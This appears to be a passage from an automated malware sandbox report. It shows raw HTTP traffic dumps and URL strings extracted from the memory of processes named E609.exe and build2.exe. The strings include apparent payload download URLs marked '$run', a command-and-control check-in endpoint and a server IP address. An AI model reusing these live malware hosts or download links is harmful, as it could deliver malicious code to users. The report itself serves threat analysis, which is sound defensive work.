Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Sat, 25 May 2024 19:29:59 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Sat, 25 May 2024 19:30:01 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Sat, 25 May 2024 19:30:02 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Sat, 25 May 2024 19:30:03 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 37 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 98 d6 08 5e 39 5c a2 f3 df fc fc 48 eb 0b db 69 f9 53 47 91 0d 0a 30 0d 0a 0d 0a Data Ascii: 27I:82O^9\HiSG0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Sat, 25 May 2024 19:30:15 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 63 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 90 df 13 49 3a 47 a4 e8 dd e1 e4 40 f0 4f 91 64 b2 45 48 95 01 bf ec 31 e5 0d 0a 30 0d 0a 0d 0a Data Ascii: 2cI:82OI:G@OdEH10
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Sat, 25 May 2024 19:30:23 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 31 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 93 54 06 65 01 f6 a3 9e fc ab 15 b0 08 db 6f a7 18 5c 9b 08 bf eb 3b af 2d 50 0a f3 dd c6 5b ee 52 c6 41 83 aa 76 d2 26 eb b2 c7 18 7e 0d 0a 30 0d 0a 0d 0a Data Ascii: 41I:82OTeo\;-P[RAv&~0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Sat, 25 May 2024 19:30:25 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 34 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 90 de 15 49 39 41 a3 e8 dd e1 f8 5f f5 4a 89 2d bb 53 51 90 4a fb ef 2c f3 2b 42 1a ae b7 d9 57 e8 0d 0a 30 0d 0a 0d 0a Data Ascii: 34I:82OI9A_J-SQJ,+BW0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Sat, 25 May 2024 19:30:31 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 63 31 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 84 42 09 25 16 f9 b5 8f bd b8 15 a5 0c ce 2c b4 59 52 db 04 e5 fd 28 e3 22 58 1b b2 ed cf 00 bc 53 da 46 d4 f7 20 86 24 e6 ad 90 52 23 e5 b4 4c 2b f8 a5 b4 6a f6 99 bc 5d af 72 94 cb 32 45 5d 39 0f 4e df a1 3d fd d4 55 84 ac c8 42 c6 36 9d 95 69 77 64 f9 7a 3a 9c c6 9d c6 76 ed 39 08 84 5a b0 4d e3 e6 d3 36 81 c7 fc 3f d7 38 f9 fb 91 e0 01 83 c4 c3 4c 1c c3 03 ae eb b4 c0 a9 ac 4f 1c ff 74 88 d8 29 82 7b 32 45 b6 88 f9 b7 ae 1a b1 4b 64 c0 c6 ba e2 d9 ba 78 d6 27 35 60 3a 6a e8 81 03 9d 78 ab a8 af 2d 90 d6 d7 44 0d 0a 30 0d 0a 0d 0a Data Ascii: c1I:82OB%,YR("XSF $R#L+j]r2E]9N=UB6iwdz:v9ZM6?8LOt){2EKdx'5`:jx-D0

Source: build2.exe, 00000013.00000003.2122792993.0000000000843000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:27060
Source: explorer.exe, 00000001.00000000.1688547736.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1690075566.000000000982D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: build2.exe, 00000013.00000003.2373219434.00000000008F8000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2373406242.0000000000903000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: build2.exe, 00000013.00000003.2373219434.00000000008F8000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2373406242.0000000000903000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: build2.exe, 00000013.00000003.2373219434.00000000008F8000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2373406242.0000000000903000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: E609.exe, 0000000F.00000002.2883282984.00000000030B0000.00000004.00000020.00020000.00000000.sdmp, E609.exe, 0000000F.00000002.2877170339.0000000000883000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cajgtus.com/files/1/build3.exe
Source: E609.exe, 0000000F.00000002.2877170339.0000000000838000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cajgtus.com/files/1/build3.exe$run
Source: E609.exe, 0000000F.00000002.2883282984.00000000030B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cajgtus.com/files/1/build3.exe$run(
Source: E609.exe, 0000000F.00000002.2877170339.0000000000838000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cajgtus.com/files/1/build3.exe$rund
Source: E609.exe, 0000000F.00000002.2877170339.0000000000838000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cajgtus.com/files/1/build3.exe$runinstall020921_delay721_sec.exe0
Source: E609.exe, 0000000F.00000002.2883282984.00000000030B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cajgtus.com/files/1/build3.exe?
Source: E609.exe, 0000000F.00000002.2877170339.0000000000883000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cajgtus.com/files/1/build3.exerun
Source: E609.exe, 0000000F.00000002.2877170339.0000000000883000.00000004.00000020.00020000.00000000.sdmp, E609.exe, 00000011.00000002.2876679850.0000000000706000.00000004.00000020.00020000.00000000.sdmp, E609.exe, 00000011.00000003.2086702511.000000000076C000.00000004.00000020.00020000.00000000.sdmp, E609.exe, 00000011.00000002.2876679850.0000000000753000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cajgtus.com/test1/get.php
Source: E609.exe, 00000011.00000002.2876679850.0000000000706000.00000004.00000020.00020000.00000000.sdmp, E609.exe, 00000011.00000002.2876679850.00000000006C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cajgtus.com/test1/get.php?pid=F8AFCDC4E800A3319FFB343E83099637
Source: E609.exe, 0000000F.00000002.2877170339.00000000007F8000.00000004.00000020.00020000.00000000.sdmp, E609.exe, 0000000F.00000002.2877170339.0000000000838000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cajgtus.com/test1/get.php?pid=F8AFCDC4E800A3319FFB343E83099637&first=true
Source: E609.exe, 0000000F.00000002.2877170339.00000000007F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cajgtus.com/test1/get.php?pid=F8AFCDC4E800A3319FFB343E83099637&first=trueZ
Source: E609.exe, 0000000F.00000002.2877170339.00000000007F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cajgtus.com/test1/get.php?pid=F8AFCDC4E800A3319FFB343E83099637&first=trueb
Source: E609.exe, 0000000F.00000002.2877170339.00000000007F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cajgtus.com/test1/get.php?pid=F8AFCDC4E800A3319FFB343E83099637&first=truep
Source: E609.exe, 00000011.00000002.2876679850.0000000000706000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cajgtus.com/test1/get.php?pid=F8AFCDC4E800A3319FFB343E83099637c
Source: E609.exe, 0000000F.00000002.2877170339.0000000000892000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cajgtus.com/test1/get.phpenh
Source: build2.exe, 00000013.00000003.2373219434.00000000008F8000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2373406242.0000000000903000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: explorer.exe, 00000001.00000000.1688547736.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1690075566.000000000982D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: build2.exe, 00000013.00000003.2373219434.00000000008F8000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2373406242.0000000000903000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: build2.exe, 00000013.00000003.2373219434.00000000008F8000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2373406242.0000000000903000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: build2.exe, 00000013.00000003.2373219434.00000000008F8000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2373539479.00000000008F9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: build2.exe, 00000013.00000003.2373219434.00000000008F8000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2373406242.0000000000903000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: explorer.exe, 00000001.00000000.1688547736.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1690075566.000000000982D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: build2.exe, 00000013.00000003.2373219434.00000000008F8000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2373539479.00000000008F9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: E609.exe, 00000009.00000002.2029153716.0000000004A10000.00000040.00001000.00020000.00000000.sdmp, E609.exe, 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, E609.exe, 0000000E.00000002.2060401394.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, E609.exe, 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, E609.exe, 00000010.00000002.2077051792.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, E609.exe, 00000011.00000002.2873470043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, E609.exe, 00000019.00000002.2186742765.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, E609.exe, 0000001B.00000002.2211120304.0000000000400000.00000040.00000400.00020000.00000000.sdmp, E609.exe, 0000001F.00000002.2266971281.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, E609.exe, 00000021.00000002.2275243210.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://https://ns1.kriston.ugns2.chalekin.ugns3.unalelath.ugns4.andromath.ug/Error
Source: explorer.exe, 00000001.00000000.1688547736.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1690075566.000000000982D000.00000004.00000001.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2373219434.00000000008F8000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2373406242.0000000000903000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: build2.exe, 00000013.00000003.2373219434.00000000008F8000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2373406242.0000000000903000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0A
Source: build2.exe, 00000013.00000003.2373219434.00000000008F8000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2373406242.0000000000903000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0N
Source: build2.exe, 00000013.00000003.2373219434.00000000008F8000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2373406242.0000000000903000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0X
Source: explorer.exe, 00000001.00000000.1688547736.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: explorer.exe, 0000002A.00000002.2897813212.000000000CF76000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2734568138.000000000D007000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://schemas.mi
Source: explorer.exe, 0000002A.00000002.2897813212.000000000CF76000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2734568138.000000000D007000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://schemas.micr
Source: explorer.exe, 00000001.00000000.1689675941.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1690859356.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1689226860.0000000007F40000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://schemas.micro
Source: E609.exe, 0000000F.00000002.2877170339.0000000000892000.00000004.00000020.00020000.00000000.sdmp, E609.exe, 0000000F.00000002.2877170339.0000000000883000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://sdfjhuz.com/dl/build2.exe
Source: E609.exe, 0000000F.00000002.2877170339.0000000000838000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://sdfjhuz.com/dl/build2.exe$run
Source: E609.exe, 0000000F.00000002.2877170339.0000000000883000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://sdfjhuz.com/dl/build2.exerun5980
Source: build2.exe, 00000013.00000003.2174697483.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2227633586.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.000000000083D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2175286059.0000000000829000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156939086.0000000000829000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: build2.exe, 00000013.00000003.2174697483.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2227633586.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.000000000083D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2175286059.0000000000829000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156939086.0000000000829000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: build2.exe, 00000013.00000003.2174697483.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2227633586.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.000000000083D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2175286059.0000000000829000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156939086.0000000000829000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: E609.exe, 0000000F.00000003.2126285857.0000000009840000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.amazon.com/
Source: build2.exe, 00000013.00000003.2373219434.00000000008F8000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2373539479.00000000008F9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com/CPS0
Source: E609.exe, 00000011.00000003.2126495485.0000000003570000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.google.com/
Source: E609.exe, 0000000F.00000003.2126555121.0000000009840000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.live.com/
Source: build2.exe, 00000013.00000002.2708700605.000000006C8CD000.00000002.00000001.01000000.0000000E.sdmp	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: E609.exe, 00000011.00000003.2126716894.0000000003570000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.nytimes.com/
Source: E609.exe, 00000021.00000002.2275243210.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://www.openssl.org/support/faq.html
Source: E609.exe, 0000000F.00000003.2126709109.0000000009840000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.reddit.com/
Source: build2.exe, 00000013.00000002.2691159740.000000001DDFD000.00000002.00001000.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2691644987.000000002020D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: E609.exe, 0000000F.00000003.2126992854.0000000009840000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.twitter.com/
Source: build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.0000000000838000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.valvesoftware.com/legal.htm
Source: E609.exe, 00000011.00000003.2127708531.0000000003570000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.wikipedia.com/
Source: E609.exe, 0000000F.00000003.2127702492.0000000009840000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.youtube.com/
Source: build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.59
Source: build2.exe, 00000013.00000003.2514930235.00000000008A5000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2354099315.00000000008A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.59/
Source: build2.exe, 00000013.00000003.2174697483.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2227633586.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.000000000083D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.59/%LB
Source: build2.exe, 00000013.00000003.2353603355.00000000008A7000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2342899375.00000000008A7000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2341806768.00000000008A6000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2342259804.00000000008A7000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2342809334.00000000008A7000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2373219434.00000000008AC000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2342138297.00000000008A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.59/.
Source: build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.59/:
Source: build2.exe, 00000013.00000003.2341998705.00000000008FB000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2341806768.00000000008FB000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2340668890.00000000008FB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.59/AFHI
Source: build2.exe, 00000013.00000003.2514930235.00000000008A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.59/I
Source: build2.exe, 00000013.00000003.2156801668.000000000083F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.59/Z
Source: build2.exe, 00000013.00000003.2174697483.000000000083F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.59/d
